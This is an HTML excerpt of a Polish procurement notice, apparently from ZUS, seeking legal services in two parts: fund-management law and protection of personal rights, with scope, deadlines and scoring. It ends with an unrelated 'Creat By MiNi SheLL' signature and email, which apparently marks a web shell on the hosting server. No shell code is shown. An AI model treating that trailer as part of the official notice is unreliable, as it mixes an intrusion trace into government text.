<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie pomocy prawnej w zakresie zarządzania środkami funduszy, których dysponentem jest Zamawiający.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie pomocy prawnej w zakresie zarządzania środkami funduszy, których dysponentem jest Zamawiający, obejmujące w szczególności:
1. Sporządzanie opinii prawnych w zakresie interpretacji i stosowania przepisów zawartych w:
- Ustawie o systemie ubezpieczeń społecznych, 
- Ustawie o finansach publicznych,
- Ustawie Prawo zamówień publicznych,
- Ustawie Prawo bankowe,
- Ustawie o obrocie instrumentami finansowymi,
- Ustawie Prawo pocztowe,
- Rozporządzeniu Ministra Pracy i Polityki Społecznej w sprawie lokowania środków Funduszu Rezerwy Demograficznej.

W przypadku propozycji zmian bądź wprowadzenia zmian w powyższych aktach prawnych, sporządzanie opinii w zakresie wpływu wprowadzonych zmian na:
- zarządzanie płynnością finansową Funduszu Ubezpieczeń Społecznych (FUS), Zakładu Ubezpieczeń Społecznych (ZUS), Funduszu Emerytur Pomostowych (FEP) oraz Funduszu Rezerwy Demograficznej (FDR),
- obsługę rachunków bankowych FUS, ZUS, FEP oraz FRD,
- zarządzanie portfelem kredytowym oraz zawieranie umów kredytowych,
- lokowanie nadwyżek finansowych FUS, ZUS, FEP oraz FRD,
- opracowanie i prezentowanie planów, do których sporządzenia jako dysponent zobowiązany jest Zakład,
- dokonywanie zmian w planach w okresie ich realizacji.

2. Opracowanie oraz opiniowanie umów zawieranych pomiędzy ZUS 
a podmiotami zewnętrznymi w następującym zakresie:
- umowy kredytowe,
- umowy dotyczącej rachunków bankowych,
- umowy o świadczenie usług powierniczych,
- umowy o lokowanie środków finansowych,
- umowy zakupu/sprzedaży papierów wartościowych oraz akcji,
- umowy pożyczki,
- umowy o dostarczanie serwisów informacyjnego oraz transakcyjnego.

3. Uczestniczenie w procesie negocjacji warunków współpracy z podmiotami zewnętrznymi.

4. Sporządzanie opinii do otrzymywanych przez Zakład projektów aktów normatywnych, obejmujących zagadnienia będące przedmiotem regulacji ww. ustaw.

5. Sporządzanie opinii i projektów zmian w podejmowanych przez Zakład Ubezpieczeń Społecznych inicjatywach mających na celu aktualizację lub zmianę obowiązujących przepisów prawnych lub powstanie nowych aktów normatywnych, obejmujących zagadnienia będące przedmiotem regulacji ww. ustaw.

6.  Sporządzanie opinii z zakresu rachunkowości.

7. Sporządzanie opinii w zakresie aktualizacji lub zmian wewnętrznych aktów prawnych obowiązujących w ZUS oraz związanych z tym pełnomocnictw oraz upoważnień.

8. Reprezentowanie Zamawiającego i sporządzanie pism procesowych dokumentujących stanowisko Zamawiającego w postępowaniu przez sądami i urzędami oraz zastępstwo prawne i procesowe.

Termin wykonania dla każdej części zamówienia -  świadczenie pomocy prawnej przez okres od daty zawarcia umowy ramowej do 31.12.2013 r. lub do wyczerpania kwoty z podatkiem VAT, jaką Zamawiający przeznaczył na sfinansowanie danej części zamówienia, na którą została zawarta umowa ramowa, jeśli nastąpi to przed 31.12.2013 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawcy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie pomocy prawnej w zakresie ochrony dóbr osobistych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie pomocy prawnej w zakresie ochrony dóbr osobistych, obejmujące w szczególności:
1. Sporządzanie opinii prawnych w zakresie interpretacji i stosowania przepisów zawartych w : 
- Ustawie Prawo prasowe, 
- Ustawie o prawie autorskim i prawach pokrewnych, 
- Ustawie o dostępie do informacji publicznej,
- Kodeksie cywilnym w szczególności w zakresie przepisów dotyczących ochrony dóbr osobistych,
- Kodeksie postępowania cywilnego i pozostałych aktach prawnych mających związek 
z działaniami podejmowanymi w powyższym zakresie.
2. Opracowywanie i występowanie w imieniu ZUS z przedsądowymi wezwaniami wydawcy, redakcji, redaktorów naczelnych i dziennikarzy do publikacji przeprosin, związanych z:
- Ustawą Prawo prasowe, 
- Ustawą o prawie autorskim i prawach pokrewnych, 
- Kodeksem cywilnym w szczególności w zakresie przepisów dotyczących ochrony dóbr osobistych,
- Kodeksem postępowania cywilnego i pozostałymi aktami prawnymi mającymi związek z działaniami podejmowanymi w powyższym zakresie.
3. Świadczenie pomocy prawnej, związanej z Ustawą Prawo prasowe, Ustawą o prawie autorskim i prawach pokrewnych, ustawie o dostępie do informacji publicznej, Kodeksem cywilnym w szczególności w zakresie przepisów dotyczących ochrony dóbr osobistych, Kodeksem postępowania cywilnego oraz innych aktach prawnych związanych z działaniami podejmowanymi w przedmiotowym zakresie, w tym:
1) prowadzenie postępowań sądowych o przymuszenie do zamieszczenia przeprosin - w przypadku odmowy dobrowolnej publikacji,
2) występowanie w imieniu ZUS z żądaniami publikacji sprostowania/odpowiedzi prasowej,
3) prowadzenie postępowań sądowych o przymuszenie do zamieszczenia sprostowania/odpowiedzi prasowej w przypadku wcześniejszej odmowy,
4) prowadzenie postępowań sądowych w związku ze składaniem aktów oskarżenia przeciwko redaktorowi naczelnemu za uchylenie się od zamieszczenia sprostowań/odpowiedzi,
5) prowadzenie pertraktacji ugodowych,
6) występowanie ze skargami na naruszenia prawa strony do rozpoznania sprawy bez nieuzasadnionej zwłoki,
7) występowanie ze skargą kasacyjną (względnie ze skargą o stwierdzenie niezgodności z prawem prawomocnego orzeczenia) oraz reprezentacji procesowej przed Sądem Najwyższym,
8) występowanie w imieniu ZUS z żądaniami zaniechania naruszania praw autorskich, wydania uzyskanych korzyści i naprawienia wyrządzonej szkody,
9) prowadzenie postępowań sądowych o naruszenie autorskich praw majątkowych.
4. Opinie prawne dotyczące zagadnień związanych z wykorzystaniem praw autorskich, w związku z zawieranymi przez Zakład umowami na produkcję radiowych i telewizyjnych audycji o charakterze poradniczym oraz innymi przedsięwzięciami edukacyjnymi podejmowanymi przez ZUS.

Termin wykonania dla każdej części zamówienia -  świadczenie pomocy prawnej przez okres od daty zawarcia umowy ramowej do 31.12.2013 r. lub do wyczerpania kwoty z podatkiem VAT, jaką Zamawiający przeznaczył na sfinansowanie danej części zamówienia, na którą została zawarta umowa ramowa, jeśli nastąpi to przed 31.12.2013 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawcy - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com